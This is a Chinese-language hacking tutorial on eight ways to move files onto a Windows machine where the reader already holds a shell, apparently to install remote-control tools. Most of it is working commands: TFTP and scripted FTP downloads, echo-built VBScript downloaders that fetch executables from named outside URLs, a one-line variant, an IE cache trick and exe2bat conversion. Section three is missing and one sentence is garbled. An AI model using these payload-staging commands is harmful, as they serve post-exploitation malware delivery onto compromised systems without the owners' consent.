文件上传八大法－远程控制必看

本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.  
一，TFTP 
格式：tftp -i get file.exe path/file.exe           默认存放在system32下，如果指定就存在指定的地方。 
二：ftp下载文件  
　　ftp下载文件一般步骤如下： 
　　echo open xxx.xxx.xxx.xxx 〉ftp.txt  
　　echo user 〉〉ftp.txt  
　　echo password 〉〉ftp.txt  
　　echo binary 〉〉ftp.txt [可选] 
　　echo get srv.exe 〉〉ftp.txt 
　　echo bye 〉〉ftp.txt  
　　ftp -s:ftp.txt(这一步是关键哟) 
　　del ftp.txt  
　　这样srv.exe文件拖略谙吕戳恕１Ｖrv.exe已经存在指定位置。 
四：写程序下载  
　　脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell下，用echo语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序实例的简化:  
　　echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉webdown.vbs 
　　echo xPost.Open "GET","http://txhak.126.com/srv.exe",0 〉〉webdown.vbs  
　　echo xPost.Send() 〉〉webdown.vbs  
　　echo Set sGet = CreateObject("ADODB.Stream") 〉〉webdown.vbs  
　　echo sGet.Mode = 3 〉〉webdown.vbs  
　　echo sGet.Type = 1 〉〉webdown.vbs  
　　echo sGet.Open() 〉〉webdown.vbs  
　　echo sGet.Write(xPost.responseBody) 〉〉webdown.vbs 
　　echo sGet.SaveToFile "srv.exe",2 〉〉webdown.vbs  
　　然后执行cscript webdown.vbs就可以啦。其中，http://txhak.126.com/srv.exe改成你放文件的网站路径，srv.exe可以改成保存文件的路径。 这里ADODB.Stream很重要如果目标机隔离了adodb.stream就会不成功。 
五：START ITS:HTTP://IP/文件名  
　　然后cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"  
　　然后DIR 文件名[1]  
　　注意：那串长文件名要用""引起来，因为有空格 
　　例子：C:\Documents and Settings\Administrator〉start its:http://xxx.xxx.xxx.xxx/srv. 
　　C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1 的目录  
　　2003-11-22 17:48 12,832 srv[1].exe  
　　1 个文件 12,832 字节 
　　列出所有文件:  
　　1 个文件 12,832 字节  
　　0 个目录 6,425,985,024 可用字节 
　　C:\Documents and Settings\Administrator〉copy C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1\srv[1].exe c:\srv.exe  
　　已复制 1 个文件 
六。一句话下载。第4种方法的精简，有时很有用的 
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 〉pig.vbs 
七。写程序下载 
echo iLocal = LCase(WScript.Arguments(1)) 〉c:\down.vbs 
echo iRemote = LCase(WScript.Arguments(0)) 〉〉c:\down.vbs 
echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉〉c:\down.vbs 
echo xPost.Open "GET",iRemote,0 〉〉c:\down.vbs 
echo xPost.Send() 〉〉c:\down.vbs 
echo Set sGet = CreateObject("ADODB.Stream") 〉〉c:\down.vbs 
echo sGet.Mode = 3 〉〉c:\down.vbs 
echo sGet.Type = 1 〉〉c:\down.vbs 
echo sGet.Open() 〉〉c:\down.vbs 
echo sGet.Write(xPost.responseBody) 〉〉c:\down.vbs 
echo sGet.SaveToFile iLocal,2 〉〉c:\down.vbs 
八.exe2bat命令行下输入，debug还原成文件 
用exe2bat这个工具把exe文件转化成bat，然后一行行敲进去，这样工作量非常大，只适合于非常短小的文件。